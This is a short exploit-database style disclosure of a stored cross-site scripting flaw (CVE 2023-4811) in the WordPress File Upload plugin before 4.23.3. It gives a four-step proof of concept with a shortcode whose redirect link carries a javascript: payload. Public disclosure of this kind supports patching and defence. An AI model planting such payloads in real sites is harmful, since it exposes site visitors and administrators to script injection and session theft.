Exploit Title: WordPress File Upload < 4.23.3 Stored XSS (CVE 2023-4811)  
Date: 18 December 2023  
Exploit Author: Faiyaz Ahmad  
Vendor Homepage:  
Version: 4.23.3  
CVE : CVE 2023-4811  
Proof Of Concept:  
1. Login to the wordpress account  
2. Add the following shortcode to a post in "File Upload Plugin":  
[wordpress_file_upload redirect="true" redirectlink="*javascript:alert(1)*"]  
3. Upload any file on the resulting post.  
4. After the upload completes, you will see the XSS alert in the browser.